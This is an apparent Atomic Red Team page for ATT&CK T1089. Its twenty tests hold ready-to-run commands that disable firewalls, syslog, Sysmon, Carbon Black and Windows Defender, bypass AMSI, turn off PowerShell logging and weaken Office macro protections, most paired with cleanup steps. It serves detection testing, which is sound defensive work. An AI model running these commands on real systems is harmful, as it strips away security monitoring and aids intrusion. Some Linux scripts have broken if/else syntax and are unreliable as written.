Skip to content

Latest commit

 

History

History
605 lines (354 loc) · 14.6 KB

T1089.md

File metadata and controls

605 lines (354 loc) · 14.6 KB

T1089 - Disabling Security Tools

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

Atomic Tests


Atomic Test #1 - Disable iptables firewall

Disables the iptables firewall

Supported Platforms: Linux

Attack Commands: Run with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service iptables stop
  chkconfig off iptables
  service ip6tables stop
  chkconfig off ip6tables
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop firewalld
  systemctl disable firewalld
fi


Atomic Test #2 - Disable syslog

Disables syslog collection

Supported Platforms: Linux

Attack Commands: Run with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service rsyslog stop
  chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop rsyslog
  systemctl disable rsyslog
fi


Atomic Test #3 - Disable Cb Response

Disable the Cb Response service

Supported Platforms: Linux

Attack Commands: Run with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi


Atomic Test #4 - Disable SELinux

Disables SELinux enforcement

Supported Platforms: Linux

Attack Commands: Run with sh!

setenforce 0


Atomic Test #5 - Disable Carbon Black Response

Disables Carbon Black Response

Supported Platforms: macOS

Attack Commands: Run with sh!

sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist


Atomic Test #6 - Disable LittleSnitch

Disables LittleSnitch

Supported Platforms: macOS

Attack Commands: Run with sh!

sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist


Atomic Test #7 - Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

Supported Platforms: macOS

Attack Commands: Run with sh!

sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist


Atomic Test #8 - Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
sysmon_driver The name of the Sysmon filter driver (this can change from the default) string SysmonDrv

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

fltmc.exe unload #{sysmon_driver}

Cleanup Commands:

sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon

Dependencies: Run with command_prompt!

Description: Sysmon filter must be loaded
Check Prereq Commands:
fltmc.exe filters | findstr #{sysmon_driver} 
Get Prereq Commands:
echo Automated installer not implemented yet, please install Sysmon manually


Atomic Test #9 - Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
website_name The name of the website on a server string Default Web Site

Attack Commands: Run with powershell!

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true

Cleanup Commands:

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false


Atomic Test #10 - Uninstall Sysmon

Uninstall Sysinternals Sysmon for Defense Evasion

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
sysmon_exe The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) Path PathToAtomicsFolder\T1089\bin\sysmon.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sysmon -u

Cleanup Commands:

sysmon -i -accepteula

Dependencies: Run with powershell!

Description: Sysmon executable must be available
Check Prereq Commands:
if(cmd /c where sysmon) {exit 0} else {exit 1} 
Get Prereq Commands:
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
Description: Sysmon must be installed
Check Prereq Commands:
if(cmd /c sc query sysmon) { exit 0} else { exit 1} 
Get Prereq Commands:
cmd /c sysmon -i -accepteula


Atomic Test #11 - AMSI Bypass - AMSI InitFailed

Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

Supported Platforms: Windows

Attack Commands: Run with powershell!

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Cleanup Commands:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)


Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key

With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

Cleanup Commands:

New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"


Atomic Test #13 - Disable Arbitrary Security Windows Service

With administrative rights, an adversary can disable Windows Services related to security products.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
service_name The name of the service to stop String McAfeeDLPAgentService

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled

Cleanup Commands:

sc.exe config #{service_name} start= auto
net.exe start #{service_name}


Atomic Test #14 - Disable PowerShell Script Block Logging

An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.

Credit to Matt Graeber (@mattifestation) for the research.

Supported Platforms: Windows

Attack Commands: Run with powershell!

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

Cleanup Commands:

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1


Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface

An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.

Credit to Matt Graeber (@mattifestation) for the research.

Supported Platforms: Windows

Attack Commands: Run with powershell!

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)


Atomic Test #16 - Tamper with Windows Defender ATP PowerShell

Attempting to disable scheduled scanning and other parts of windows defender atp

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1

Cleanup Commands:

Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0


Atomic Test #17 - Tamper with Windows Defender Command Prompt

Attempting to disable scheduled scanning and other parts of windows defender atp

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend

Cleanup Commands:

sc start WinDefend
sc config WinDefend start=enabled


Atomic Test #18 - Tamper with Windows Defender Registry

Disable Windows Defender from starting after a reboot

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1

Cleanup Commands:

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0


Atomic Test #19 - Disable Microft Office Security Features

Gorgon group may disable Office security features so that their code can run https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

Attack Commands: Run with powershell!

New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"

Cleanup Commands:

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"


Atomic Test #20 - Remove Windows Defender Definition Files

Removing definition files would cause ATP to not fire for AntiMalware Check MpCmdRun.exe man page for info on all arguments https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All